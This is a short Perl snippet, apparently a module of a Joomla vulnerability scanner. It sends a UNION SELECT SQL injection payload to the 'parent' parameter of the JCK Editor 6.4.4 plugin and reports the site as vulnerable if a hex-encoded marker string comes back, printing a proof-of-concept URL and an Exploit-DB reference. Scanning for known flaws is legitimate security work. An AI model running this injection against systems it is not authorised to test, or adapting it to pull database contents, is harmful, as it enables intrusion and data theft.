#start jckeditor plugin exploit Checker
$source=$ua->get("$target/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,0x54683173317374337374,NULL,NULL,NULL,NULL,NULL--%20aa")->decoded_content;
if ($source =~ /Th1s1st3st/g) {
	dprint("Checking module: jckeditor");
	tprint("Joomla Component JCK Editor 6.4.4 - 'parent' SQL Injection\nPOC: $target/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,0x54683173317374337374,NULL,NULL,NULL,NULL,NULL--%20aa\nEDB : https://www.exploit-db.com/exploits/45423/\n");
}
#end jckeditor plugin exploit Checker